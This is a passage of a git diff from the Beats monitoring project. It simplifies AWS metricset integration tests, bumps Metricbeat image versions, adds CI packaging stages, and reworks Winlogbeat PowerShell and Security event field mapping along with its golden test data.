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" } diff --git a/x-pack/metricbeat/module/aws/rds/rds_integration_test.go b/x-pack/metricbeat/module/aws/rds/rds_integration_test.go index 0be93854039d..f19d5a7dd054 100644 --- a/x-pack/metricbeat/module/aws/rds/rds_integration_test.go +++ b/x-pack/metricbeat/module/aws/rds/rds_integration_test.go @@ -26,24 +26,7 @@ func TestFetch(t *testing.T) { } assert.NotEmpty(t, events) - - for _, event := range events { - t.Logf("%s/%s event: %+v", metricSet.Module().Name(), metricSet.Name(), event) - - // RootField - mtest.CheckEventField("service.name", "string", event, t) - mtest.CheckEventField("cloud.provider", "string", event, t) - mtest.CheckEventField("cloud.provider", "string", event, t) - mtest.CheckEventField("cloud.region", "string", event, t) - mtest.CheckEventField("cloud.availability_zone", "string", event, t) - - // MetricSetField - mtest.CheckEventField("db_instance.arn", "string", event, t) - mtest.CheckEventField("db_instance.class", "string", event, t) - mtest.CheckEventField("queries", "float", event, t) - mtest.CheckEventField("latency.select", "float", event, t) - mtest.CheckEventField("login_failures", "float", event, t) - } + mbtest.TestMetricsetFieldsDocumented(t, metricSet, events) } func TestData(t *testing.T) { diff --git a/x-pack/metricbeat/module/aws/s3_daily_storage/s3_daily_storage_integration_test.go b/x-pack/metricbeat/module/aws/s3_daily_storage/s3_daily_storage_integration_test.go index e570cd5bb730..e410251090e3 100644 --- a/x-pack/metricbeat/module/aws/s3_daily_storage/s3_daily_storage_integration_test.go +++ b/x-pack/metricbeat/module/aws/s3_daily_storage/s3_daily_storage_integration_test.go @@ -27,14 +27,7 @@ func TestFetch(t *testing.T) { } assert.NotEmpty(t, events) - - for _, event := range events { - mtest.CheckEventField("cloud.region", "string", event, t) - mtest.CheckEventField("aws.dimensions.BucketName", "string", event, t) - mtest.CheckEventField("aws.dimensions.StorageType", "string", event, t) - mtest.CheckEventField("aws.s3.metrics.BucketSizeBytes.avg", "float", event, t) - mtest.CheckEventField("aws.s3.metrics.NumberOfObjects.avg", "float", event, t) - } + mbtest.TestMetricsetFieldsDocumented(t, metricSet, events) } func TestData(t *testing.T) { diff --git a/x-pack/metricbeat/module/aws/s3_request/s3_request_integration_test.go b/x-pack/metricbeat/module/aws/s3_request/s3_request_integration_test.go index 6836d8469756..cd11e95fd88a 100644 --- a/x-pack/metricbeat/module/aws/s3_request/s3_request_integration_test.go +++ b/x-pack/metricbeat/module/aws/s3_request/s3_request_integration_test.go @@ -18,7 +18,6 @@ import ( ) func TestFetch(t *testing.T) { - t.Skip("flaky test: https://github.com/elastic/beats/issues/21826") config := mtest.GetConfigForTest(t, "s3_request", "60s") metricSet := mbtest.NewReportingMetricSetV2Error(t, config) @@ -28,28 +27,7 @@ func TestFetch(t *testing.T) { } assert.NotEmpty(t, events) - - for _, event := range events { - mtest.CheckEventField("cloud.region", "string", event, t) - mtest.CheckEventField("aws.dimensions.BucketName", "string", event, t) - mtest.CheckEventField("aws.dimensions.StorageType", "string", event, t) - mtest.CheckEventField("s3.metrics.AllRequests.avg", "int", event, t) - mtest.CheckEventField("s3.metrics.GetRequests.avg", "int", event, t) - mtest.CheckEventField("s3.metrics.PutRequests.avg", "int", event, t) - mtest.CheckEventField("s3.metrics.DeleteRequests.avg", "int", event, t) - mtest.CheckEventField("s3.metrics.HeadRequests.avg", "int", event, t) - mtest.CheckEventField("s3.metrics.PostRequests.avg", "int", event, t) - mtest.CheckEventField("s3.metrics.SelectRequests.avg", "int", event, t) - mtest.CheckEventField("s3.metrics.SelectScannedBytes.avg", "float", event, t) - mtest.CheckEventField("s3.metrics.SelectReturnedBytes.avg", "float", event, t) - mtest.CheckEventField("s3.metrics.ListRequests.avg", "int", event, t) - mtest.CheckEventField("s3.metrics.BytesDownloaded.avg", "float", event, t) - mtest.CheckEventField("s3.metrics.BytesUploaded.avg", "float", event, t) - mtest.CheckEventField("s3.metrics.4xxErrors.avg", "int", event, t) - mtest.CheckEventField("s3.metrics.5xxErrors.avg", "int", event, t) - mtest.CheckEventField("s3.metrics.FirstByteLatency.avg", "float", event, t) - mtest.CheckEventField("s3.metrics.TotalRequestLatency.avg", "float", event, t) - } + mbtest.TestMetricsetFieldsDocumented(t, metricSet, events) } func TestData(t *testing.T) { diff --git a/x-pack/metricbeat/module/aws/sqs/sqs_integration_test.go b/x-pack/metricbeat/module/aws/sqs/sqs_integration_test.go index 3f1eddb9faa9..24f1c314b73d 100644 --- a/x-pack/metricbeat/module/aws/sqs/sqs_integration_test.go +++ b/x-pack/metricbeat/module/aws/sqs/sqs_integration_test.go @@ -27,23 +27,7 @@ func TestFetch(t *testing.T) { } assert.NotEmpty(t, events) - - for _, event := range events { - // RootField - mtest.CheckEventField("service.name", "string", event, t) - mtest.CheckEventField("cloud.region", "string", event, t) - // MetricSetField - mtest.CheckEventField("empty_receives", "float", event, t) - mtest.CheckEventField("messages.delayed", "float", event, t) - mtest.CheckEventField("messages.deleted", "float", event, t) - mtest.CheckEventField("messages.not_visible", "float", event, t) - mtest.CheckEventField("messages.received", "float", event, t) - mtest.CheckEventField("messages.sent", "float", event, t) - mtest.CheckEventField("messages.visible", "float", event, t) - mtest.CheckEventField("oldest_message_age.sec", "float", event, t) - mtest.CheckEventField("sent_message_size", "float", event, t) - mtest.CheckEventField("queue.name", "string", event, t) - } + mbtest.TestMetricsetFieldsDocumented(t, metricSet, events) } func TestData(t *testing.T) { diff --git a/x-pack/metricbeat/module/aws/terraform.tf b/x-pack/metricbeat/module/aws/terraform.tf index e767a028ab1b..4f00b88df5b9 100644 --- a/x-pack/metricbeat/module/aws/terraform.tf +++ b/x-pack/metricbeat/module/aws/terraform.tf @@ -46,3 +46,23 @@ resource "aws_s3_bucket_object" "test" { bucket = aws_s3_bucket.test.id content = "something" } + +resource "aws_instance" "test" { + ami = data.aws_ami.latest-amzn.id + monitoring = true + instance_type = "t1.micro" + tags = { + Name = "metricbeat-test" + } +} + +data "aws_ami" "latest-amzn" { + most_recent = true + owners = ["amazon"] + filter { + name = "name" + values = [ + "amzn2-ami-hvm-*", + ] + } +} diff --git a/x-pack/metricbeat/module/awsfargate/cloudformation.yml b/x-pack/metricbeat/module/awsfargate/cloudformation.yml index ac43e044edce..515a4da35ff5 100644 --- a/x-pack/metricbeat/module/awsfargate/cloudformation.yml +++ b/x-pack/metricbeat/module/awsfargate/cloudformation.yml @@ -61,7 +61,7 @@ Resources: ExecutionRoleArn: !Ref ExecutionRole ContainerDefinitions: - Name: metricbeat-container - Image: docker.elastic.co/beats/metricbeat:7.11.0-SNAPSHOT + Image: docker.elastic.co/beats/metricbeat:8.0.0-SNAPSHOT Secrets: - Name: ELASTIC_CLOUD_ID ValueFrom: !Ref CloudIDArn diff --git a/x-pack/metricbeat/module/awsfargate/task_stats/_meta/docs.asciidoc b/x-pack/metricbeat/module/awsfargate/task_stats/_meta/docs.asciidoc index 1bc226bdd534..6940bfc8f710 100644 --- a/x-pack/metricbeat/module/awsfargate/task_stats/_meta/docs.asciidoc +++ b/x-pack/metricbeat/module/awsfargate/task_stats/_meta/docs.asciidoc @@ -110,7 +110,7 @@ Resources: ExecutionRoleArn: !Ref ExecutionRole ContainerDefinitions: - Name: metricbeat-container - Image: docker.elastic.co/beats/metricbeat:7.11.0-SNAPSHOT + Image: docker.elastic.co/beats/metricbeat:8.0.0-SNAPSHOT Secrets: - Name: ELASTIC_CLOUD_ID ValueFrom: !Ref CloudIDArn @@ -158,7 +158,9 @@ Resources: [float] ==== Create CloudFormation Stack -Once the CloudFormation template is saved locally into `clouformation.yml`, AWS +When copying the CloudFormation template, please make sure the Metricbeat +container image is the correct version. +Once the template is saved locally into `clouformation.yml`, AWS CLI can be used to create a stack using one command: ---- aws --region us-east-1 cloudformation create-stack --stack-name --template-body file://./cloudformation.yml --capabilities CAPABILITY_NAMED_IAM --parameters ParameterKey=SubnetID,ParameterValue= ParameterKey=CloudAuthArn,ParameterValue= ParameterKey=CloudIDArn,ParameterValue= ParameterKey=ClusterName,ParameterValue= ParameterKey=RoleName,ParameterValue= ParameterKey=TaskName,ParameterValue= ParameterKey=ServiceName,ParameterValue= ParameterKey=LogGroupName,ParameterValue= diff --git a/x-pack/packetbeat/Jenkinsfile.yml b/x-pack/packetbeat/Jenkinsfile.yml index 7cc39a8b5015..dcefc94c6694 100644 --- a/x-pack/packetbeat/Jenkinsfile.yml +++ b/x-pack/packetbeat/Jenkinsfile.yml @@ -82,3 +82,7 @@ stages: mage: "mage build unitTest" platforms: ## override default labels in this specific stage. - "windows-7-32-bit" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/x-pack/winlogbeat/Jenkinsfile.yml b/x-pack/winlogbeat/Jenkinsfile.yml index 0fcde2f326ce..8b03fed80a3e 100644 --- a/x-pack/winlogbeat/Jenkinsfile.yml +++ b/x-pack/winlogbeat/Jenkinsfile.yml @@ -55,3 +55,9 @@ stages: mage: "mage build unitTest" platforms: ## override default labels in this specific stage. - "windows-7-32-bit" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false + platforms: ## override default labels in this specific stage. + - "immutable && ubuntu-18" diff --git a/x-pack/winlogbeat/module/powershell/config/winlogbeat-powershell.js b/x-pack/winlogbeat/module/powershell/config/winlogbeat-powershell.js index 4ef1155086bc..698b12711bf2 100644 --- a/x-pack/winlogbeat/module/powershell/config/winlogbeat-powershell.js +++ b/x-pack/winlogbeat/module/powershell/config/winlogbeat-powershell.js @@ -333,11 +333,9 @@ var powershell = (function () { var userParts = evt.Get("winlog.event_data.UserId").split("\\"); evt.Delete("winlog.event_data.UserId"); if (userParts.length === 2) { - evt.Delete("user"); evt.Put("user.domain", userParts[0]); evt.Put("user.name", userParts[1]); evt.AppendTo("related.user", userParts[1]); - evt.Delete("winlog.event_data.UserId"); } }; @@ -346,7 +344,18 @@ var powershell = (function () { evt.Delete("winlog.event_data.Connected User"); if (userParts.length === 2) { evt.Put("powershell.connected_user.domain", userParts[0]); + if (evt.Get("user.domain")) { + evt.Put("destination.user.domain", evt.Get("user.domain")); + } + evt.Put("source.user.domain", userParts[0]); + evt.Put("user.domain", userParts[0]); + evt.Put("powershell.connected_user.name", userParts[1]); + if (evt.Get("user.name")) { + evt.Put("destination.user.name", evt.Get("user.name")); + } + evt.Put("source.user.name", userParts[1]); + evt.Put("user.name", userParts[1]); evt.AppendTo("related.user", userParts[1]); } }; @@ -541,6 +550,18 @@ var powershell = (function () { ignore_missing: true, fail_on_error: false, }) + .Convert({ + fields: [ + { + from: "winlog.user.identifier", + to: "user.id", + type: "string", + }, + ], + mode: "copy", + ignore_missing: true, + fail_on_error: false, + }) .Add(normalizeCommonFieldNames) .Add(addEngineVersion) .Add(addPipelineID) @@ -583,6 +604,18 @@ var powershell = (function () { ignore_missing: true, fail_on_error: false, }) + .Convert({ + fields: [ + { + from: "winlog.user.identifier", + to: "user.id", + type: "string", + }, + ], + mode: "copy", + ignore_missing: true, + fail_on_error: false, + }) .Add(normalizeCommonFieldNames) .Add(addFileInfo) .Add(addScriptBlockID) @@ -594,6 +627,18 @@ var powershell = (function () { .Add(addRunspaceID) .Add(addScriptBlockID) .Add(removeEmptyEventData) + .Convert({ + fields: [ + { + from: "winlog.user.identifier", + to: "user.id", + type: "string", + }, + ], + mode: "copy", + ignore_missing: true, + fail_on_error: false, + }) .Build(); var event4105 = new processor.Chain() diff --git a/x-pack/winlogbeat/module/powershell/test/testdata/4103.evtx.golden.json b/x-pack/winlogbeat/module/powershell/test/testdata/4103.evtx.golden.json index e040dd0d8f45..c6c186bd12e2 100644 --- a/x-pack/winlogbeat/module/powershell/test/testdata/4103.evtx.golden.json +++ b/x-pack/winlogbeat/module/powershell/test/testdata/4103.evtx.golden.json @@ -1,6 +1,12 @@ [ { "@timestamp": "2020-05-15T08:11:47.8979495Z", + "destination": { + "user": { + "domain": "VAGRANT", + "name": "vagrant" + } + }, "event": { "action": "Executing Pipeline", "category": [ @@ -72,8 +78,15 @@ "related": { "user": "vagrant" }, + "source": { + "user": { + "domain": "VAGRANT", + "name": "vagrant" + } + }, "user": { "domain": "VAGRANT", + "id": "S-1-5-21-1350058589-2282154016-2764056528-1000", "name": "vagrant" }, "winlog": { @@ -196,6 +209,7 @@ }, "user": { "domain": "VAGRANT", + "id": "S-1-5-21-1350058589-2282154016-2764056528-1000", "name": "vagrant" }, "winlog": { diff --git a/x-pack/winlogbeat/module/powershell/test/testdata/4104.evtx.golden.json b/x-pack/winlogbeat/module/powershell/test/testdata/4104.evtx.golden.json index 5926c0f789e3..3c2af0061853 100644 --- a/x-pack/winlogbeat/module/powershell/test/testdata/4104.evtx.golden.json +++ b/x-pack/winlogbeat/module/powershell/test/testdata/4104.evtx.golden.json @@ -28,6 +28,9 @@ "sequence": 1, "total": 1 }, + "user": { + "id": "S-1-5-21-1350058589-2282154016-2764056528-1000" + }, "winlog": { "activity_id": "{fb13c9de-29f7-0001-18e0-13fbf729d601}", "api": "wineventlog", @@ -85,6 +88,9 @@ "sequence": 1, "total": 1 }, + "user": { + "id": "S-1-5-21-1350058589-2282154016-2764056528-1000" + }, "winlog": { "activity_id": "{fb13c9de-29f7-0000-79db-13fbf729d601}", "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/powershell/test/testdata/4105.evtx.golden.json b/x-pack/winlogbeat/module/powershell/test/testdata/4105.evtx.golden.json index 2cbd24255ea5..f19c03b5abc7 100644 --- a/x-pack/winlogbeat/module/powershell/test/testdata/4105.evtx.golden.json +++ b/x-pack/winlogbeat/module/powershell/test/testdata/4105.evtx.golden.json @@ -26,6 +26,9 @@ }, "runspace_id": "9c031e5c-8d5a-4b91-a12e-b3624970b623" }, + "user": { + "id": "S-1-5-21-1350058589-2282154016-2764056528-1000" + }, "winlog": { "activity_id": "{dd68516a-2930-0000-5962-68dd3029d601}", "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/powershell/test/testdata/4106.evtx.golden.json b/x-pack/winlogbeat/module/powershell/test/testdata/4106.evtx.golden.json index e598bb408eeb..117c907387e6 100644 --- a/x-pack/winlogbeat/module/powershell/test/testdata/4106.evtx.golden.json +++ b/x-pack/winlogbeat/module/powershell/test/testdata/4106.evtx.golden.json @@ -26,6 +26,9 @@ }, "runspace_id": "3f1a9181-0523-4645-a42c-2c1868c39332" }, + "user": { + "id": "S-1-5-21-1350058589-2282154016-2764056528-1000" + }, "winlog": { "activity_id": "{e3200b8a-290e-0002-332a-20e30e29d601}", "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/config/winlogbeat-security.js b/x-pack/winlogbeat/module/security/config/winlogbeat-security.js index 44d0e8eb34db..e624a819bebc 100644 --- a/x-pack/winlogbeat/module/security/config/winlogbeat-security.js +++ b/x-pack/winlogbeat/module/security/config/winlogbeat-security.js @@ -179,7 +179,7 @@ var security = (function () { "4634": [["authentication"], ["end"], "logged-out"], "4647": [["authentication"], ["end"], "logged-out"], "4648": [["authentication"], ["start"], "logged-in-explicit"], - "4657": [["configuration"], ["change"], "registry-value-modified"], + "4657": [["registry", "configuration"], ["change"], "registry-value-modified"], "4670": [["iam", "configuration"],["admin", "change"],"permissions-changed"], "4672": [["iam"], ["admin"], "logged-in-special"], "4673": [["iam"], ["admin"], "privileged-service-called"], @@ -250,8 +250,8 @@ var security = (function () { "4770": [["authentication"], ["start"], "kerberos-service-ticket-renewed"], "4771": [["authentication"], ["start"], "kerberos-preauth-failed"], "4776": [["authentication"], ["start"], "credential-validated"], - "4778": [["authentication"], ["start"], "session-reconnected"], - "4779": [["authentication"], ["end"], "session-disconnected"], + "4778": [["authentication", "session"], ["start"], "session-reconnected"], + "4779": [["authentication", "session"], ["end"], "session-disconnected"], "4781": [["iam"], ["user", "change"], "renamed-user-account"], "4798": [["iam"], ["user", "info"], "group-membership-enumerated"], // process enumerates the local groups to which the specified user belongs "4799": [["iam"], ["group", "info"], "user-member-enumerated"], // a process enumerates the members of the specified local group @@ -1351,7 +1351,7 @@ var security = (function () { "16903": "Publish", }; - // Trust Types + // Trust Types // https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4706 var trustTypes = { "1": "TRUST_TYPE_DOWNLEVEL", @@ -1360,7 +1360,7 @@ var security = (function () { "4": "TRUST_TYPE_DCE" } - // Trust Direction + // Trust Direction // https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4706 var trustDirection = { "0": "TRUST_DIRECTION_DISABLED", @@ -1369,7 +1369,7 @@ var security = (function () { "3": "TRUST_DIRECTION_BIDIRECTIONAL" } - // Trust Attributes + // Trust Attributes // https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4706 var trustAttributes = { "0": "UNDEFINED", @@ -1899,35 +1899,58 @@ var security = (function () { }) .Build(); - var copyTargetUser = new processor.Chain() - .Convert({ - fields: [ - {from: "winlog.event_data.TargetUserSid", to: "user.id"}, - {from: "winlog.event_data.TargetUserName", to: "user.name"}, - {from: "winlog.event_data.TargetDomainName", to: "user.domain"}, - ], - ignore_missing: true, - }) - .Add(function(evt) { - var user = evt.Get("winlog.event_data.TargetUserName"); - if (user) { - if (/.@*/.test(user)) { - user = user.split('@')[0]; - evt.Put('user.name', user); - } - evt.AppendTo('related.user', user); + + var copyTargetUser = function(evt) { + var targetUserId = evt.Get("winlog.event_data.TargetUserSid"); + if (targetUserId) { + if (evt.Get("user.id")) evt.Put("user.target.id", targetUserId); + else evt.Put("user.id", targetUserId); + } + + var targetUserName = evt.Get("winlog.event_data.TargetUserName"); + if (targetUserName) { + if (/.@*/.test(targetUserName)) { + targetUserName = targetUserName.split('@')[0]; } - }) - .Build(); + + evt.AppendTo("related.user", targetUserName); + if (evt.Get("user.name")) evt.Put("user.target.name", targetUserName); + else evt.Put("user.name", targetUserName); + } + + var targetUserDomain = evt.Get("winlog.event_data.TargetDomainName"); + if (targetUserDomain) { + if (evt.Get("user.domain")) evt.Put("user.target.domain", targetUserDomain); + else evt.Put("user.domain", targetUserDomain); + } + } + + var copyMemberToUser = function(evt) { + var member = evt.Get("winlog.event_data.MemberName"); + if (!member) { + return; + } + + var userName = member.split(',')[0].replace('CN=', '').replace('cn=', ''); + + evt.AppendTo("related.user", userName); + evt.Put("user.target.name", userName); + } var copyTargetUserToGroup = new processor.Chain() .Convert({ fields: [ {from: "winlog.event_data.TargetUserSid", to: "group.id"}, + {from: "winlog.event_data.TargetSid", to: "group.id"}, {from: "winlog.event_data.TargetUserName", to: "group.name"}, {from: "winlog.event_data.TargetDomainName", to: "group.domain"}, ], ignore_missing: true, + }).Add(function(evt) { + if (!evt.Get("user.target")) return; + evt.Put("user.target.group.id", evt.Get("group.id")); + evt.Put("user.target.group.name", evt.Get("group.name")); + evt.Put("user.target.group.domain", evt.Get("group.domain")); }) .Build(); @@ -2194,16 +2217,10 @@ var security = (function () { var groupMgmtEvts = new processor.Chain() .Add(copySubjectUser) .Add(copySubjectUserLogonId) + .Add(copyMemberToUser) .Add(copyTargetUserToGroup) .Add(renameCommonAuthFields) .Add(addEventFields) - .Add(function(evt) { - var member = evt.Get("winlog.event_data.MemberName"); - if (!member) { - return; - } - evt.AppendTo("related.user", member.split(',')[0].replace('CN=', '').replace('cn=', '')); - }) .Build(); var auditLogCleared = new processor.Chain() diff --git a/x-pack/winlogbeat/module/security/test/testdata/4744.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4744.evtx.golden.json index 5500629ef454..1c7d689ef4b4 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4744.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4744.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2903", "name": "testdistlocal" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/4745.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4745.evtx.golden.json index c34a17a17236..a19ba89ec839 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4745.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4745.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2903", "name": "testdistlocal1" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/4746.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4746.evtx.golden.json index 0280c7157847..be20ce400a48 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4746.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4746.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2903", "name": "testdistlocal1" }, "host": { @@ -35,7 +36,15 @@ "user": { "domain": "TEST", "id": "S-1-5-21-1717121054-434620538-60925301-2794", - "name": "at_adm" + "name": "at_adm", + "target": { + "group": { + "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2903", + "name": "testdistlocal1" + }, + "name": "Administrator" + } }, "winlog": { "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/test/testdata/4747.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4747.evtx.golden.json index e5da6a981547..c903452389dd 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4747.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4747.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2903", "name": "testdistlocal1" }, "host": { @@ -35,7 +36,15 @@ "user": { "domain": "TEST", "id": "S-1-5-21-1717121054-434620538-60925301-2794", - "name": "at_adm" + "name": "at_adm", + "target": { + "group": { + "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2903", + "name": "testdistlocal1" + }, + "name": "Administrator" + } }, "winlog": { "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/test/testdata/4748.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4748.evtx.golden.json index 78d9a0146b6a..3d620a576f07 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4748.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4748.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2903", "name": "testdistlocal1" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/4749.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4749.evtx.golden.json index fd9687692199..c1409cf74117 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4749.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4749.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2904", "name": "testglobal" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/4750.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4750.evtx.golden.json index 4933fc9371a9..aabca7b49f0c 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4750.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4750.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2904", "name": "testglobal1" }, "host": { diff --git a/x-pack/winlogbeat/module/security/test/testdata/4751.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4751.evtx.golden.json index 52db79ef5381..0e9aa9016991 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4751.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4751.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2904", "name": "testglobal1" }, "host": { @@ -35,7 +36,15 @@ "user": { "domain": "TEST", "id": "S-1-5-21-1717121054-434620538-60925301-2794", - "name": "at_adm" + "name": "at_adm", + "target": { + "group": { + "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2904", + "name": "testglobal1" + }, + "name": "Administrator" + } }, "winlog": { "api": "wineventlog", diff --git a/x-pack/winlogbeat/module/security/test/testdata/4752.evtx.golden.json b/x-pack/winlogbeat/module/security/test/testdata/4752.evtx.golden.json index c4eaab128204..76fb4727e1f5 100644 --- a/x-pack/winlogbeat/module/security/test/testdata/4752.evtx.golden.json +++ b/x-pack/winlogbeat/module/security/test/testdata/4752.evtx.golden.json @@ -18,6 +18,7 @@ }, "group": { "domain": "TEST", + "id": "S-1-5-21-1717121054-434620538-60925301-2904", "name": "testglobal1" }, "host": { @@ -35,7 +36,15 @@ "user": { "domain": "TEST", 